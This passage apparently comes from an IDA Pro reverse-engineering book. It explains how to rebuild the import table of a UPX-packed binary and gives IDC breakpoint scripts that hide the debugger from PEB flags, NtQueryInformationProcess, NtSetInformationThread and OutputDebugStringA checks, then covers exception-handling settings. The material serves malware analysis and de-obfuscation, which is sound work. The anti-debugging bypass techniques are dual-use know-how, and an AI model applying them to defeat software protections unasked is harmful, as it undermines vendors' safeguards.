UPX1:0040A014 dd offset ntdll_RtlEnterCriticalSection ; DATA XREF: sub_401564+34↑r
UPX1:0040A014 ; sub_4015A0+27↑r ...

It is worth noting at this point that the debugger adopts a slightly differ-

ent naming scheme than we are accustomed to. The debugger prefixes all

functions exported from shared libraries with the name of the associated

library followed by an underscore. For example, the function GetCommandLineA

in kernel32.dll is assigned the name kernel32_GetCommandLineA. This ensures that

unique names are generated should two libraries export the same name.

We need to overcome two problems with the import table shown in the

preceding listing. First, in order for function calls to become more readable,

we need to name each entry in the import table according to the function it

references. If the entries are named properly, IDA will automatically display

function signatures from its type libraries. Naming each import table entry

is a relatively easy task as long as we have a name to assign. This leads to the

second problem: obtaining the proper name. One approach is to parse the

debugger-generated name, strip off the library name, and assign the remain-

ing text as the name of the import table entry. The only problem with this

approach is the fact that library names and function names may both contain

underscore characters, making it difficult in some cases to determine the

exact length of a function’s name within a longer name string. Recognizing

this difficulty, this is nonetheless the approach taken by the renimp.idc import

table–renaming script that ships with IDA (found in <IDADIR>/idc).
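The underscore ambiguity is easy to reproduce. The following Python sketch is not the logic of renimp.idc; it is a minimal illustration with hypothetical helper names and a hypothetical list of loaded modules. It contrasts a naive split at the first underscore with a variant that strips the prefix of a known module name, which is one way to sidestep the ambiguity when the list of loaded modules is available.

```python
def strip_after_first_underscore(name):
    """Naive split: correct only when the module name contains no underscore."""
    return name.split("_", 1)[1] if "_" in name else name

def strip_known_module(name, modules):
    """Strip the longest matching module prefix; fall back to the naive split."""
    for mod in sorted(modules, key=len, reverse=True):
        prefix = mod + "_"
        if name.startswith(prefix):
            return name[len(prefix):]
    return strip_after_first_underscore(name)

loaded = ["kernel32", "ntdll", "ws2_32"]   # hypothetical module list

naive_ok = strip_after_first_underscore("kernel32_GetCommandLineA")
naive_bad = strip_after_first_underscore("ws2_32_connect")
robust = strip_known_module("ws2_32_connect", loaded)
```

Here naive_bad comes out as 32_connect, while the module-aware variant recovers connect.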

In order for this script to execute properly, it must be run while the

debugger is active (so that it has access to loaded library names), and we must

be able to locate the reconstructed import table within the de-obfuscated

binary. One strategy for determining where the reconstructed import table

will lie is to track calls to GetProcAddress and note where the results are stored

into memory. Listing 25-3 shows the code used by UPX to call GetProcAddress

and store the result.

UPX1:00408897 ① call dword ptr [esi+8090h]
UPX1:0040889D or eax, eax
UPX1:0040889F jz short loc_4088A8
UPX1:004088A1 ② mov [ebx], eax
UPX1:004088A3 ③ add ebx, 4

Listing 25-3: UPX code to resolve and store imported function addresses

The call to GetProcAddress takes place at ①, with the result being stored into memory at ②. Making note of the value held in the ebx register at ② will tell us where the import table is located. The ebx register is advanced by four bytes at ③ to prepare it for the next iteration of the function resolution loop.
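If the value of ebx is recorded each time the store instruction executes, the extent of the reconstructed table follows directly. The following Python sketch assumes that such a list of observed store addresses has already been collected (for example, by noting ebx at a breakpoint); table_bounds and the sample addresses are hypothetical and only illustrate the arithmetic.

```python
def table_bounds(store_addresses, slot_size=4):
    """Return (start, end) covering every slot written, with end exclusive."""
    if not store_addresses:
        return None
    return min(store_addresses), max(store_addresses) + slot_size

# Hypothetical ebx values observed on successive passes through the loop.
observed = [0x40A000, 0x40A004, 0x40A008]
bounds = table_bounds(observed)
```

For the sample values the table spans 0x40A000 up to, but not including, 0x40A00C.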

Once we have located the reconstructed import table, renimp.idc requires

that we highlight the contents of the table using a click-and-drag operation

from the beginning to the end of the table. The renimp.idc script iterates across

the selection, obtains the name of the referenced function, strips the library


name prefix, and names the import table entry accordingly. Following execu-

tion of this script, the import table shown previously is transformed into the

import table shown here:

UPX1:0040A000 ; LPSTR __stdcall GetCommandLineA()
UPX1:0040A000 GetCommandLineA dd offset kernel32_GetCommandLineA
UPX1:0040A000 ; DATA XREF: UPX0:loc_40128F↑r
UPX1:0040A000 ; start+1↓o
UPX1:0040A004 RtlFreeHeap dd offset ntdll_RtlFreeHeap ; DATA XREF: UPX0:004011E4↑r
UPX1:0040A004 ; UPX0:0040120A↑r ...
UPX1:0040A008 ; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
UPX1:0040A008 GetVersionExA dd offset kernel32_GetVersionExA ; DATA XREF: UPX0:004011D4↑r
UPX1:0040A00C RtlAllocateHeap dd offset ntdll_RtlAllocateHeap ; DATA XREF: UPX0:004011B3↑r
UPX1:0040A00C ; sub_405E98+D↑r ...
UPX1:0040A010 ; HANDLE __stdcall GetProcessHeap()
UPX1:0040A010 GetProcessHeap dd offset kernel32_GetProcessHeap ; DATA XREF: UPX0:004011AA↑r
UPX1:0040A014 RtlEnterCriticalSection dd offset ntdll_RtlEnterCriticalSection
UPX1:0040A014 ; DATA XREF: sub_401564+34↑r
UPX1:0040A014 ; sub_4015A0+27↑r ...

We see that the script has done the work of renaming each import table

entry, but IDA has added function prototypes for each function whose type

information IDA is aware of. Note that no type information would be visible

if the library name prefix had not been stripped from each function name.

The renimp.idc script can fail to properly extract an imported function name

when the name of the module in which the function resides contains an

underscore. The ws2_32 networking library is a well-known example of a

module whose name happens to contain an underscore. Special handling

of ws2_32 takes place within renimp.idc; however, any other module whose

name contains an underscore will cause renimp.idc to parse function names

incorrectly.

An alternative approach to renaming import table entries may be

employed when a single instruction is responsible for storing all resolved

function addresses as UPX does in Listing 25-3. If such an instruction can

be identified, such as the instruction at Y in the listing, then we can take

advantage of the fact that breakpoint conditions in IDA are specified using

IDC statements. In this case we might set a conditional breakpoint at address

004088A1 and make the conditional expression invoke a function that we define.

Here we name the function createImportLabel and define it as follows:

static createImportLabel() {

auto n = Name(EAX);

auto i = strstr(n, "_");

while (i != -1) {

n = n[i+1:];

i = strstr(n, "_");

}

MakeUnkn(EBX,DOUNK_EXPAND);

MakeDword(EBX);


if (MakeNameEx(EBX,n,SN_NOWARN) == 0) {

MakeNameEx(EBX,n + "_",SN_NOWARN);

}

return 0;

}

This function begins by querying for the name referenced by EAX.

Recall that EAX contains the result of the call to GetProcAddress and thus

should refer to a function within some DLL. Next, the function loops to trun-

cate the name to just that portion following the last underscore found in the

original name. Finally, a series of function calls is made to properly format

the target location (referenced by EBX) as a 4-byte data item, and apply a

name to that location. By returning zero, the function informs IDA that the

breakpoint should not be honored, with the result that execution continues

without pausing.
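The truncation loop in createImportLabel is worth testing on a few names before relying on it. The following Python sketch mirrors that loop outside of IDA; the function name after_last_underscore is hypothetical, and the sample inputs simply follow the library-prefix naming scheme described earlier. It shows that keeping only the text after the last underscore handles a module such as ws2_32, but mangles any function whose own name contains an underscore.

```python
def after_last_underscore(name):
    """Mirror of the IDC loop: keep only the text following the last underscore."""
    idx = name.find("_")
    while idx != -1:
        name = name[idx + 1:]
        idx = name.find("_")
    return name

plain_case = after_last_underscore("kernel32_GetCommandLineA")
module_with_underscore = after_last_underscore("ws2_32_connect")
function_with_underscore = after_last_underscore("msvcrt___set_app_type")
```

The first two calls yield GetCommandLineA and connect, as intended. The third yields only type, so a binary that imports C runtime functions with underscores in their names would need a different splitting rule.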

In Chapter 24, we discussed how to specify breakpoint conditions in IDA’s

debugger. Installing a user-defined function as a breakpoint handler is not

quite as straightforward as setting and editing a breakpoint and entering

createImportLabel() as the breakpoint condition. While this is exactly the con-

dition that we wish to enter in this case, the problem is that, from IDA’s per-

spective, createImportLabel is an undefined function. The workaround for

this is to create a script file (IDC by definition) containing our function

along with a simple main function that looks something like the following:

static main() {
   AddBpt(ScreenEA());                                // ①
   SetBptCnd(ScreenEA(), "createImportLabel()");      // ②
}

Placing the cursor on the instruction that you wish to set the breakpoint on and then running this script (File ▸ Script File) results in a conditional breakpoint that calls createImportLabel each time it is hit. The AddBpt function ① adds a breakpoint at the specified location (the cursor location in this case), and the SetBptCnd function ② adds a condition to an existing breakpoint.

The condition is specified as a string containing the IDC statement to evalu-

ate each time the breakpoint is hit. With this breakpoint in place, once the

de-obfuscation has completed, we will have a labeled import table without

having to go through the trouble of locating the table within the process’s

memory space.

Yet another approach for deriving name information involves searching

memory for the file headers associated with a function address and then

parsing the export table described in those headers to locate the name

of the function being referenced. This is essentially a reverse lookup of a

function name given the function’s address. Scripts (RebuildImports.idc/

RebuildImports.py) based on this concept are available on the book’s website.

Either of these scripts may be executed in lieu of renimp.idc with nearly iden-

tical results. The problems faced by renimp.idc when dealing with modules

whose names contain an underscore character are avoided because function

names are extracted directly from export tables present in the process address

space.
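The reverse lookup described above can be sketched in a few lines of Python. This is only an illustration of the idea, not the logic of RebuildImports.py: it assumes the export table has already been parsed into a name-to-RVA mapping, and the module base, RVAs, and helper names below are hypothetical.

```python
def build_reverse_index(module_base, exports):
    """Map absolute addresses back to exported names.

    exports: dict of exported name -> RVA, as recovered from an export table.
    When several names share an address, the alphabetically first one is kept.
    """
    index = {}
    for name in sorted(exports):
        index.setdefault(module_base + exports[name], name)
    return index


def name_for_address(index, address):
    """Return the exported name located exactly at address, or None."""
    return index.get(address)


# Hypothetical values, for illustration only.
MODULE_BASE = 0x7C900000
parsed_exports = {"RtlFreeHeap": 0x1000, "RtlGetLastWin32Error": 0x2000}

index = build_reverse_index(MODULE_BASE, parsed_exports)
print(name_for_address(index, MODULE_BASE + 0x1000))
```

Because the name comes straight from the export table, no string splitting on underscores is needed, which is why this approach sidesteps the naming problem mentioned above.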

The effect of naming each import table entry properly carries through

to the disassembly itself, as shown in the following automatically updated dis-

assembly listing:

UPX0:00403C5B call ds:RtlFreeHeap

UPX0:00403C61 test eax, eax

UPX0:00403C63 jnz short loc_403C7B

UPX0:00403C65 call sub_40230F

UPX0:00403C6A mov esi, eax

UPX0:00403C6C call ds:RtlGetLastWin32Error

The name of each renamed import table entry is propagated to all loca-

tions from which imported functions are called, making the disassembly far

more readable. It is worth noting that any formatting changes that you make

while you’re working within the debugger are automatically applied to the

database view as well. In other words, there is no need to take a memory

snapshot simply to capture formatting changes that you have made. The pur-

pose of a memory snapshot is to migrate memory content (code and data)

from a process’s address space back into an IDA database.

Hiding the Debugger

A popular method of preventing the use of debuggers as de-obfuscation

tools is debugger detection. The authors of obfuscation tools understand just

as well as you do that debuggers are useful for undoing their handiwork.

In response, they often take measures to prevent their tools from running

if the tools detect the presence of a debugger. We discussed a few debugger-

detection methods in Chapter 21. As mentioned in Chapter 21, Nicolas

Falliere’s article “Windows Anti-Debug Reference”8 contains an excellent

summary of a number of Windows-specific techniques for detecting the pres-

ence of a debugger. You can counter several of these detection techniques by

using a simple script to start your debugger session and automatically config-

ure some breakpoints. While it is possible to use Python to counter some of

these techniques, we will ultimately be using conditional breakpoints, which

we can only specify using IDC. For this reason the sample code that follows is

all written in IDC.

In order to launch a debugging session from a script, we begin with the

following code:

auto n;
for (n = 0; n < GetEntryPointQty(); n++) {
   auto ord = GetEntryOrdinal(n);
   if (GetEntryName(ord) == "TlsCallback_0") {
      AddBpt(GetEntryPoint(ord));
      break;
   }
}
RunTo(BeginEA());
GetDebuggerEvent(WFNE_SUSP, -1);

8. See http://www.symantec.com/connect/articles/windows-anti-debug-reference/.

These statements check for the presence of a TLS callback function, set

a breakpoint if one is found, and then launch the debugger, requesting to

break on the entry point address before waiting for the operation to com-

plete (strictly speaking, we should test the return value of GetDebuggerEvent as

well). Once our script regains control, we have an active debugger session,

and the process we wish to debug is mapped into memory along with all

libraries on which it depends.

The first debugger detection we will bypass is the IsDebugged field of the

process environment block (PEB). This is a 1-byte field that is set to the value 1

if the process is being debugged and 0 otherwise. The field lies 2 bytes into

the PEB, so all we need to do is find the PEB and patch the proper byte to the

value 0. This also happens to be the field tested by the Windows API function

IsDebuggerPresent, so we manage to kill two birds with one stone in this case.

If we know that we have stopped at the program entry point as opposed to a

TLS callback, then locating the PEB turns out to be rather simple, because the

EBX register contains a pointer to the PEB upon entry to the process. If

instead the process has stopped at a TLS callback function, then we need a

more general-purpose means of finding the PEB. We will take an approach

similar to that often used in shellcode and obfuscators. The basic idea is to

locate the current thread information block (TIB)9 and follow an embedded

pointer to find the PEB. The following code locates the PEB and makes the

appropriate patch:

auto seg;
auto peb = 0;
auto tid = GetCurrentThreadId();
auto tib = sprintf("TIB[%08X]", tid);   //IDA naming convention
for (seg = FirstSeg(); seg != BADADDR; seg = NextSeg(seg)) {
   if (SegName(seg) == tib) {
      peb = Dword(seg + 0x30);   //read PEB pointer from TIB
      break;
   }
}
if (peb != 0) {
   PatchDbgByte(peb + 2, 0);   //Set PEB!IsDebugged to zero
}

Note that the PatchDbgByte function was not introduced until IDA 5.5.

When used with versions prior to IDA 5.5, PatchByte will work but will also

modify (patch) the database if the address specified is present in the database.
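To make the pointer arithmetic concrete, here is a minimal Python simulation of the same two steps: read the PEB pointer from offset 0x30 of the TIB, then clear the byte at offset 2 of the PEB. The FakeMemory class and the two base addresses are assumptions made purely for illustration; nothing here talks to a real debugger.

```python
import struct

TIB_PEB_POINTER_OFFSET = 0x30   # offset of the PEB pointer within the TIB
PEB_IS_DEBUGGED_OFFSET = 2      # offset of the 1-byte IsDebugged field


class FakeMemory:
    """Sparse little-endian memory standing in for a debugged process."""

    def __init__(self):
        self.cells = {}

    def write(self, addr, data):
        for i, value in enumerate(data):
            self.cells[addr + i] = value

    def read(self, addr, size):
        return bytes(self.cells.get(addr + i, 0) for i in range(size))

    def dword(self, addr):
        return struct.unpack("<I", self.read(addr, 4))[0]


def clear_is_debugged(mem, tib_base):
    """Follow TIB -> PEB and zero the IsDebugged byte; return the PEB address."""
    peb = mem.dword(tib_base + TIB_PEB_POINTER_OFFSET)
    if peb != 0:
        mem.write(peb + PEB_IS_DEBUGGED_OFFSET, b"\x00")
    return peb


# Illustrative addresses only.
tib_base, peb_base = 0x7FFDF000, 0x7FFD5000
mem = FakeMemory()
mem.write(tib_base + TIB_PEB_POINTER_OFFSET, struct.pack("<I", peb_base))
mem.write(peb_base + PEB_IS_DEBUGGED_OFFSET, b"\x01")   # process looks debugged

found_peb = clear_is_debugged(mem, tib_base)
```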

9. This is also known as a thread environment block (TEB).

Another anti-debugging technique mentioned in Falliere’s article involves testing several bits in another field of the PEB named NtGlobalFlags. The bits relate to the operation of a process’s heap and are set to 1 when a process is being debugged. Assuming variable peb remains set from the previous example, the following code retrieves the NtGlobalFlags field from the PEB, resets the offending bits, and stores the flags back into the PEB.

globalFlags = Dword(peb + 0x68) & ~0x70; //read and mask PEB.NtGlobalFlags

PatchDword(peb + 0x68, globalFlags); //patch PEB.NtGlobalFlags
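The mask 0x70 covers three adjacent bits. The short Python sketch below spells them out using the heap-debugging flag names from the Windows global flags (tail checking, free checking, and parameter validation) and shows that other bits survive the masking. The function name is hypothetical.

```python
FLG_HEAP_ENABLE_TAIL_CHECK = 0x10
FLG_HEAP_ENABLE_FREE_CHECK = 0x20
FLG_HEAP_VALIDATE_PARAMETERS = 0x40

DEBUG_HEAP_MASK = (FLG_HEAP_ENABLE_TAIL_CHECK
                   | FLG_HEAP_ENABLE_FREE_CHECK
                   | FLG_HEAP_VALIDATE_PARAMETERS)


def clear_debug_heap_flags(flags):
    """Reset the three heap-debugging bits in a 32-bit flags value."""
    return flags & ~DEBUG_HEAP_MASK & 0xFFFFFFFF


print(hex(DEBUG_HEAP_MASK))
print(hex(clear_debug_heap_flags(0x470)))
```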

Several techniques in Falliere’s article rely on differences in information

returned by system functions when a process is being debugged as opposed

to when a process is not being debugged. The first function mentioned in

the article is NtQueryInformationProcess, found in ntdll.dll. Using this function,

a process may request information regarding its ProcessDebugPort. If the pro-

cess is being debugged, the result is non-zero; if it is not being debugged,

the result should be zero. One way to avoid detection in this manner is to set

a breakpoint on NtQueryInformationProcess and then specify a breakpoint con-

dition function to filter out ProcessDebugPort requests. In order to automati-

cally locate this instruction, we take the following steps:

1. Look up the address of NtQueryInformationProcess.

2. Set a breakpoint on NtQueryInformationProcess.

3. Add a breakpoint condition to call a function we will name

bpt_NtQueryInformationProcess, which will be executed each time

NtQueryInformationProcess gets called.

In order to find the address of NtQueryInformationProcess, we need to

remember that the function will be named ntdll_NtQueryInformationProcess in

the debugger. The code to configure the necessary breakpoint appears here:

func = LocByName("ntdll_NtQueryInformationProcess");

AddBpt(func);

SetBptCnd(func, "bpt_NtQueryInformationProcess()");

What remains is for us to implement the breakpoint function that will

keep the debugger hidden from an inquiring process. The prototype for

NtQueryInformationProcess is shown here:

NTSTATUS WINAPI NtQueryInformationProcess(
   __in       HANDLE ProcessHandle,
   __in       PROCESSINFOCLASS ProcessInformationClass,   //➊
   __out      PVOID ProcessInformation,                   //➋
   __in       ULONG ProcessInformationLength,
   __out_opt  PULONG ReturnLength
);

Information about a process is requested by providing an integer query identifier in the ProcessInformationClass parameter ➊. Information is returned via the user-supplied buffer pointed to by the ProcessInformation parameter ➋. A caller may pass the enumerated constant ProcessDebugPort (value 7) in order to query the debugging status of a given process. If a process is being debugged by a user-space debugger, the return value passed via the supplied pointer will be non-zero. If the process is not being debugged, the return value will be zero. A breakpoint function that always sets the ProcessDebugPort return value to zero is shown here:

#define ProcessDebugPort 7
static bpt_NtQueryInformationProcess() {
   auto p_ret;
   if (Dword(ESP + 8) == ProcessDebugPort) {   //➊ test ProcessInformationClass
      p_ret = Dword(ESP + 12);                 //➋
      if (p_ret) {                             //➌
         PatchDword(p_ret, 0);                 //➍ fake no debugger present
      }
      EIP = Dword(ESP);                        //➎ skip function, just return
      ESP = ESP + 24;                          //➏ stdcall so clear args from stack
      EAX = 0;                                 //➐ signifies success
   }
   return 0;                                   //don’t pause at the breakpoint
}

Recall that this function is invoked each time NtQueryInformationProcess is called. On entry, the stack pointer is pointing to the saved return address, which lies on top of the five arguments to NtQueryInformationProcess. The breakpoint function begins by examining the value of the ProcessInformationClass to determine whether the caller is requesting ProcessDebugPort information ➊. If the caller is requesting ProcessDebugPort, the function continues by retrieving the return value pointer ➋, testing that it is non-null ➌, and finally storing a return value of zero ➍ to make it appear that no debugger is attached. In order to skip the remainder of the function, EIP is then modified by reading the saved return address ➎, after which ESP is adjusted by 24 bytes (the 4-byte return address plus five 4-byte arguments) to simulate a stdcall return ➏. NtQueryInformationProcess returns an NTSTATUS code, which is set to 0 (success) at ➐ before returning.
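The stack bookkeeping is easy to get wrong, so it may help to replay it on a mock stack. The following Python sketch mirrors the breakpoint function's logic against plain dictionaries; the register and memory dictionaries, the addresses, and the function name are all assumptions made for illustration, not IDA APIs.

```python
PROCESS_DEBUG_PORT = 7
NUM_ARGS = 5   # NtQueryInformationProcess takes five 4-byte arguments


def bpt_nt_query_information_process(regs, mem):
    """Mock of the breakpoint handler.

    regs: dict holding ESP, EIP, and EAX.
    mem:  dict mapping dword-aligned addresses to 32-bit values.
    """
    esp = regs["ESP"]
    if mem[esp + 8] == PROCESS_DEBUG_PORT:      # ProcessInformationClass
        p_ret = mem[esp + 12]                   # ProcessInformation pointer
        if p_ret:
            mem[p_ret] = 0                      # report "no debug port"
        regs["EIP"] = mem[esp]                  # resume at saved return address
        regs["ESP"] = esp + 4 + 4 * NUM_ARGS    # pop return address + arguments
        regs["EAX"] = 0                         # STATUS_SUCCESS
    return 0                                    # never pause at the breakpoint


# Illustrative stack layout at function entry.
esp = 0x0012FF00
out_buf = 0x0012FF80
mem = {
    esp: 0x00401234,          # saved return address
    esp + 4: 0xFFFFFFFF,      # ProcessHandle
    esp + 8: PROCESS_DEBUG_PORT,
    esp + 12: out_buf,        # ProcessInformation
    esp + 16: 4,              # ProcessInformationLength
    esp + 20: 0,              # ReturnLength (optional, null here)
    out_buf: 0xCCCCCCCC,      # stale buffer contents
}
regs = {"ESP": esp, "EIP": 0x7C90D7E0, "EAX": 0xDEADBEEF}

result = bpt_nt_query_information_process(regs, mem)
```

The same pattern applies to any stdcall function hooked at its entry point: the adjustment is always 4 bytes for the return address plus 4 bytes per argument.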

Another function mentioned in Falliere’s article is NtSetInformationThread,

which is also found in ntdll.dll. The prototype for this function is shown here:

NTSTATUS NtSetInformationThread(

IN HANDLE ThreadHandle,

IN THREADINFOCLASS ThreadInformationClass,

IN PVOID ThreadInformation,

IN ULONG ThreadInformationLength

);

The anti-debugging technique involves passing the value

ThreadHideFromDebugger in the ThreadInformationClass parameter, which

causes a thread to be detached from a debugger. Bypassing this technique

involves the same basic setup as the previous example. The resulting setup

code is shown here:

func = LocByName("ntdll_NtSetInformationThread");

AddBpt(func); //break at function entry

SetBptCnd(func, "bpt_NtSetInformationThread()");

The associated breakpoint function is shown here:

#define ThreadHideFromDebugger 0x11
static bpt_NtSetInformationThread() {
   if (Dword(ESP + 8) == ThreadHideFromDebugger) {   //➊ test ThreadInformationClass
      EAX = 0;             //➋ STATUS_SUCCESS
      EIP = Dword(ESP);    //➌ just return
      ESP = ESP + 20;      //➍ simulate stdcall
   }
   return 0;
}

On entry we test the value of the ThreadInformationClass parameter ➊ and bypass the function body if the user has specified ThreadHideFromDebugger. Bypassing the function body is accomplished by setting our desired return value ➋ and modifying the instruction pointer by reading the saved return address out of the stack ➌. We simulate the stdcall return by making a 20-byte adjustment to ESP ➍.

The last function that we will discuss, whose use as an anti-debugging

technique is also discussed in Falliere’s article, is OutputDebugStringA from

kernel32.dll. The prototype of this function is shown here:

void WINAPI OutputDebugStringA(

__in_opt LPCTSTR lpOutputString

);

In this example, WINAPI is a synonym for _stdcall and is used to specify

the calling convention employed by OutputDebugStringA. Strictly speaking,

this function has no return value, as specified by the void return type in its

prototype; however, according to the article, this function “returns” 1 when

no debugger is attached to the calling process, and it “returns” the address

of the string passed as a parameter if it is called while a debugger is attached

to the calling process. Under normal circumstances, _stdcall functions that

do return a value return that value in the EAX register. Since EAX must hold

some value when OutputDebugStringA returns, it can be argued that this is the

return value of the function; however, since the official return type is void,

there is no documentation or guarantee as to what value EAX may actually

hold in this case. This particular anti-debugging technique simply relies on

the observed behavior of the function. One solution to the observed change

in return values is to ensure that EAX contains 1 whenever OutputDebugStringA

returns. The following IDC code implements this technique:

func = LocByName("kernel32_OutputDebugStringA");

AddBpt(func);

//fix the return value as expected in non-debugged processes

//also adjust EIP and ESP

SetBptCnd(func, "!((EAX = 1) && (EIP = Dword(ESP)) && (ESP = ESP + 8))");   //➊

This example uses the same technique for automatically locating the OutputDebugStringA function that we used in the preceding examples. However, in contrast to the preceding examples, the work that needs to be done when the breakpoint is hit is simple enough to be specified in an IDC expression ➊ (rather than requiring a dedicated function). In this case, the breakpoint expression modifies (note this is assignment rather than comparison) the EAX register to ensure that it contains 1 when the function returns and also adjusts EIP and ESP to bypass the function. The breakpoint condition is negated to cause the breakpoint to be skipped in all cases, because the result of the Boolean and expression is always expected to be nonzero.
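The following Python sketch mimics that expression with assignment expressions (Python 3.8 or later) to show why its negation normally evaluates to zero. It assumes that IDC's && short-circuits the way C's does; the function name and the sample addresses are hypothetical.

```python
def output_debug_string_condition(eax, eip, esp, stack):
    """Mirror !((EAX = 1) && (EIP = Dword(ESP)) && (ESP = ESP + 8)).

    stack maps addresses to dwords. Returns (condition, eax, eip, esp),
    where a condition of 0 means "do not pause at the breakpoint".
    """
    stop = not ((eax := 1) and (eip := stack[esp]) and (esp := esp + 8))
    return int(stop), eax, eip, esp


# Typical case: every assigned value is nonzero, so the condition is 0.
normal = output_debug_string_condition(
    0x12345678, 0x7C85AE3B, 0x0012FF00, {0x0012FF00: 0x00401000})

# Degenerate case: a zero return address short-circuits the expression,
# ESP is left unadjusted, and the negated condition becomes 1.
degenerate = output_debug_string_condition(
    0x12345678, 0x7C85AE3B, 0x0012FF00, {0x0012FF00: 0})
```

In practice a saved return address of zero should not occur, which is why the text can treat the condition as always skipping the breakpoint.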

A script (HideDebugger.idc) that combines all of the elements presented

in this section into a useful tool for simultaneously initiating debugging ses-

sions and implementing measures to combat anti-debugging attempts is

available on the book’s website. For more information on hiding the pres-

ence of the debugger, please see Ilfak’s blog, where he presents several hid-

ing techniques.10

IDAStealth

While the HideDebugger script discussed in the previous section is useful for demonstrating some basic programmatic interaction with the debugger and some basics of library function hooking, the total number of known anti-debugging techniques and the complexity of those techniques argue for more robust anti-anti-debugging than can be provided by a simple script. Fortunately, the IDAStealth plug-in is designed to meet our needs for a powerful debugger-hiding capability. Written by Jan Newger, IDAStealth was the winner of Hex-Rays’s 2009 plug-in writing contest. The plug-in is written in C++ and is available in both source and binary form.

10. See http://www.hexblog.com/2005/11/simple_trick_to_hide_ida_debug.html, http://www.hexblog.com/2005/11/stealth_plugin_1.html, and http://www.hexblog.com/2005/11/the_ultimate_stealth_method_1.html.

The binary components of IDAStealth consist of a plug-in and a helper

library, both of which need to be installed to <IDADIR>/plugins. Upon initial

activation, IDAStealth presents the configuration dialog shown in Figure 25-6.

Figure 25-6: IDAStealth configuration dialog

Several tabs full of options allow you to decide which anti-anti-debugging

techniques you wish to employ. Once activated, IDAStealth implements eva-

sion techniques for virtually every known debugger-detection technique,

including those discussed in the Falliere article and those addressed by the

HideDebugger.idc script developed earlier.

Name          IDAStealth
Author        Jan Newger
Distribution  C++ source and binary
Price         Free
Description   Windows debugger-hiding plug-in
Information   http://www.newgre.net/idastealth/

Dealing with Exceptions

Occasionally, programs expect to handle any exceptions generated during their execution. As we saw in Chapter 21, obfuscated programs often go so far as to intentionally generate exceptions as both an anti–control flow technique and an anti-debugging technique. Unfortunately, exceptions are often indicative of a problem, and the purpose of debuggers is to assist us in localizing problems. Therefore, debuggers typically want to handle all exceptions that occur when a program is running in order to help us find bugs.

When a program expects to handle its own exceptions, we need to pre-

vent the debugger from intercepting such exceptions, or, at a minimum, once

an exception is intercepted, we need a means to have the debugger forward

the exception to the process at our discretion. Fortunately, IDA’s debugger

has the capability to pass along individual exceptions as they occur or to auto-

matically pass along all exceptions of a specified type.

Automated exception processing is configured via the Debugger ▸ Debugger Options command; the resulting dialog is shown in Figure 25-7.

Figure 25-7: The Debugger Setup dialog

In addition to allowing several events to be configured to automatically

stop the debugger and a number of events to be automatically logged to

IDA’s message window, the Debugger Setup dialog is used to configure the

debugger’s exception-handling behavior. The Edit Exceptions button opens

the Exceptions configuration dialog shown in Figure 25-8.

Figure 25-8: The Exceptions configuration dialog

For each exception type known to the debugger, the dialog lists an oper-

ating system–specific exception code, the name of the exception, whether

the debugger will stop the process or not (Stop/No), and whether the debugger

will handle the exception or automatically pass the exception to the applica-

tion (Debugger/Application). A master list of exceptions and default settings

for handling each exception is contained in <IDADIR>/cfg/exceptions.cfg. In

addition, the configuration file contains messages to be displayed whenever

an exception of a given type occurs while the debugger is executing a pro-

cess. Changes to the debugger’s default exception-handling behavior may

be made by editing exceptions.cfg with a text editor. In exceptions.cfg, the values

stop and nostop are used to indicate whether the debugger should suspend

the process or not when a given exception occurs.

Exception handling may also be configured on a per-session (that is, while

you have a particular database open) basis by editing individual exceptions

via the Exceptions configuration dialog. To modify the debugger’s behavior

for a given exception type, right-click the desired exception in the Excep-

tions configuration dialog and select Edit. Figure 25-9 shows the resulting

Exception editing dialog.

Figure 25-9: The Exception editing dialog

Two options, corresponding to the two configurable options in exceptions.cfg,

may be configured for any exception. First, it is possible to specify whether

the debugger should stop the process when an exception of the specified

type occurs or whether execution should continue. Beware: Allowing the

process to continue may result in an infinite exception-generation loop if

you also elect to have the debugger handle the exception.

The second configuration option allows you to decide whether a given

exception type should be passed to the application being debugged so the

application can have a chance to process the exception using its own excep-

tion handlers. When the proper operation of an application depends on

such exception handlers being executed, you should choose to pass the associ-

ated exception types to the application. This may be required when analyzing

obfuscated code such as that generated by the tElock utility (which registers

its own exception handlers) described in Chapter 21.

Unless you have configured IDA to continue execution and to pass a

specific exception type to the application, IDA will pause execution and

report exceptions to you as they occur. If you elect to continue execution of

the program, IDA will then display the Exception Handling dialog shown in

Figure 25-10.

Figure 25-10: The Exception Handling dialog

At this point you have the option of changing the manner in which IDA

handles the given exception type (Change exception definition), passing the

exception on to the application (Yes), or allowing IDA to eat the exception

(No). Passing the exception to the application allows the application to han-

dle the exception using any configured exception handlers. If you choose No,

IDA attempts to continue execution, which is likely to fail unless you have cor-

rected the condition that was responsible for causing the exception.

A special circumstance arises when you are single stepping through code

and IDA determines that the instruction you are about to execute will gener-

ate an exception, as is the case with an int 3, an icebp, or a popf that will set

the trace flag; IDA displays the dialog shown in Figure 25-11.

Figure 25-11: The exception confirmation dialog

In most cases, the Run option is the most suitable choice and results in

the application seeing the behavior that it expects when a debugger is not

attached (as noted in the dialog). In working through this dialog, you are

simply acknowledging that an exception is about to be generated. If you

choose Run, in short order you will then be notified that an exception has

occurred, and when you continue execution, you will be presented with the

Exception Handling dialog of Figure 25-10 to decide how the exception

should be dealt with.

Determining how an application will handle an exception requires that

we know how to trace exception handlers, which in turn requires that we

know how to locate exception handlers. Ilfak discusses tracing Windows SEH

handlers in a blog post titled “Tracing exception handlers.”11 The basic idea

is to locate any interesting exception handlers by walking the application’s

list of installed exception handlers. For Windows SEH exceptions, a pointer

to the head of this list may be found as the first dword in the thread environ-

ment block (TEB). The list of exception handlers is a standard linked-list

data structure that contains a pointer to the next exception handler in the

chain and a pointer to the function that should be called to handle any excep-

tion that is generated. Exceptions are passed down the list from one handler

to another until a handler chooses to handle the exception and notify the

operating system that the process may resume normal execution. If none

of the installed exception handlers choose to handle the current exception,

the operating system terminates the process or, when the process is being

debugged, notifies the debugger that an exception has occurred within

the debugged process.

Under the IDA debugger, TEBs are mapped to an IDA database section

named TIB[NNNNNNNN], where NNNNNNNN is the eight-digit hexadecimal represen-

tation of the thread’s identification number. The following listing shows an

example of the first dword in one such section:

TIB[000009E0]:7FFDF000 TIB_000009E0_ segment byte public 'DATA' use32

TIB[000009E0]:7FFDF000 assume cs:TIB_000009E0_

TIB[000009E0]:7FFDF000 ;org 7FFDF000h

TIB[000009E0]:7FFDF000 dd offset dword_22FFE0   ; ➊

